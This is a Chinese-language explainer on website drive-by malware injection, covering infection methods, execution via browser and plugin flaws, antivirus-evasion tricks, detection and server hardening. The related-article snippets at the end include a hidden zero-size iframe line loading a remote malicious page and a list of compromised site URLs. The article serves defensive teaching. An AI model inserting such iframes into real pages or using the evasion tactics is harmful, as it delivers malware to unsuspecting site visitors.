网站挂马的原理与防御
网站挂马
•
网站挂马是指黑客通过入侵或者其他方式控制了网站的权限,在网站的Web页面中插入网马,用户在访问被挂马的网站时也会访问黑客构造的网马,网马在被用户浏览器访问时就会利用浏览器或者相关插件的漏洞,下载并执行恶意软件
常见的方式:
1.将木马伪装为页面元素。木马则会被浏览器自动下载到本地。
2.利用脚本运行的漏洞下载木马
3.利用脚本运行的漏洞释放隐含在网页脚本中的木马
4.将木马伪装为缺失的组件,或和缺失的组件捆绑在一起(例如:flash播放插件)。这样既达到了下载的目的,下载的组件又会被浏览器自动执行。
5.通过脚本运行调用某些com组件,利用其漏洞下载木马。
6.在渲染页面内容的过程中利用格式溢出释放木马(例如:ani格式溢出漏洞)
7.在渲染页面内容的过程中利用格式溢出下载木马(例如:flash9.0.115的播放漏洞)
执行方式
1.利用页面元素渲染过程中的格式溢出执行shellcode进一步执行下载的木马
2.利用脚本运行的漏洞执行木马
3.伪装成缺失组件的安装包被浏览器自动执行
4.通过脚本调用com组件利用其漏洞执行木马。
5.利用页面元素渲染过程中的格式溢出直接执行木马。
6.利用com组件与外部其他程序通讯,通过其他程序启动木马(例如:realplayer10.5存在的播放列表溢出漏洞)
在与网马斗争的过程中,为了躲避杀毒软件的检测,一些网马还具有了以下行为:
1.修改系统时间,使杀毒软件失效
2.摘除杀毒软件的HOOK挂钩,使杀毒软件检测失效
3.修改杀毒软件病毒库,使之检测不到恶意代码。
4.通过溢出漏洞不直接执行恶意代码,而是执行一段调用脚本,以躲避杀毒软件对父进程的检测。
检测方式
1.特征匹配。将网页挂马的脚本按脚本病毒处理进行检测。但是网页脚本变形方式、加密方式比起传统的PE格式病毒更为多样,检测起来也更加困难。
2.主动防御。当浏览器要做出某些动作时,做出提示,例如:下载了某插件的安装包,会提示是否运行。比如浏览器创建一个暴风影音播放器时,提示是否允许运行。在多数情况下用户都会点击是,网页木马会因此得到执行。
3.检查父进程是否为浏览器。这种方法可以很容易的被躲过且会对很多插件造成误报。
如何防止
(1):对网友开放上传附件功能的网站一定要进行身份认证,并只允许信任的人使用上传程序。
(2):保证你所使用的程序及时的更新。
(3):不要在前台网页上加注后台管理程序登陆页面的链接。
(4):要时常备份数据库等重要文件,但不要把备份数据库放在程序默认的备份目录下。
(5):管理员的用户名和密码要有一定复杂性,不能过于简单。
(6):IIS中禁止目录的写入和执行功能,二项功能组合,可以有效的防止ASP木马。
(7):可以在服务器、虚拟主机控制面板,设置执行权限选项中,直接将有上传权限的目录,取消ASP的运行权限。
(8):创建一个robots.txt上传到网站根目录。Robots能够有效的防范利用搜索引擎窃取信息的骇客。点此查看robots.txt使用方法。
对于网页被挂马 可以找下专业安全人士 及时的处理会避免因为网页被挂马造成的危害。
网站挂马的原理与防御相关推荐
- qqsafe病毒 arp网站挂马 原理剖析-786ts.qqsafe-qqservicesyydswfhuw8ysjftwf.org(转载)
昨天小站被挂马了,每次打开都会自动弹出一个对话框,提示正准备安装...,然后就消失.查看页面的源文件会发现在代码的最后面被加上了9 ~0 ]* U9 N2 ^ <body>" z ...
- 金山安全报告:二月漏洞频出 网站挂马猖獗
赚足眼球的"猫癣" 一款早在春节之前就已经发出预警的病毒,在大假结束后还是席卷了国内网络,无论称呼"猫癣"还是"犇牛",被电脑用户们牢牢记住 ...
- BT天堂网站挂马事件后续:“大灰狼”远控木马分析及幕后真凶调查
9月初安全团队披露bt天堂网站挂马事件,该网站被利用IE神洞CVE-2014-6332挂马,如果用户没有打补丁或开启安全软件防护,电脑会自动下载执行大灰狼远控木马程序. 鉴于bt天堂电影下载网站访问量 ...
- 某可人官方网站挂马Trojan-PSW.Win32.OnLineGames.sbg
某可人官方网站挂马Trojan-PSW.Win32.OnLineGames.sbg endurer 原创 2008-02-29 第1版 1.网站首页包含代码: /--- <iframe src= ...
- 网站挂马危害及其防御措施
网页挂马是攻击者通过在正常的页面中(通常是网站的主页)插入一段代码.浏览者在打开该页面的时候,这段代码被执行,然后下载并运行某木马的服务器端程序,进而控制浏览者的主机.通俗点说就是将网页木马这样的攻击 ...
- 各种网站挂马的代码和原理
只要不破坏原有的语言逻辑,那就想插入哪里就写哪里了,最基本的语句当然是<iframe src=http://www.fucksb.net/mm.htm width=0 height=0>& ...
- 全国知名高校网站挂马现象严重 考生面临安全风险
据瑞星"云安全"系统监测,6月18日,"湖北工业大学"."哈尔滨理工大学"."武汉理工大学"等全国知名理工类高校网站被黑 ...
- 《越狱》完结 米帅迷应小心纹身网站挂马
据瑞星"云安全"系统监测,5月18日是世界博物馆日,"中国书画苑"."今日艺术网"."中国艺术品在线"等网站被黑客挂马, ...
- 2010.1.26网站挂马播报
今天共监测到9个网站被挂马,149个挂马链接,为了防止误点击,把地址稍微做了处理. 以下为挂马网站: h11p://www.cdldbz.gov.cn h11p://www.cfl.cqu.edu.c ...
- 检测网站挂马程序(Python)
系统管理员通常从svn/git中检索代码,部署站点后通常首先会生成该站点所有文件的MD5值,如果上线后网站页面内容被篡改(如挂马)等,可以比对之前生成MD5值快速查找去那些文件被更改,为了使系统管理员 ...
最新文章
- 携程基于大数据分析的实时风控体系
- 第一次作业:深入Linux源码分析进程模型
- react学习(50)--解决异步执行顺序问题
- 华为,百度豪投,这类程序员要再次上榜了!
- java monitor 翻译_管程(Monitor)概念及Java的实现原理
- JavaWeb JDBC初步连接和JDBC连接规范化
- python db api_dbapi · PyPI
- 计算机技术1000字,计算机专业毕业实习报告1000字
- web前端笔试试题(答案)
- java技术选型文档模板_系统方案汇总文档
- 自媒体行业现在还能赚钱吗?
- 安卓4.1.2 新建第一个native c++程序ndk开发以及解决出现configure projects一直卡住的问题
- 拿来主义vs.自主创新
- C++编译时出现未定义的引用问题解决
- 基因序列的保守性分值
- 随机变量的特征函数及应用
- PAT 乙级 1044 火星数字
- Circulation(IF=23.054):更年期后的女性冠心病患者代谢组学研究
- 基于51单片机及NB-IoT的消防管道压力检测原理图PCB
- 企业邮箱如何代理?企业邮箱哪家好用?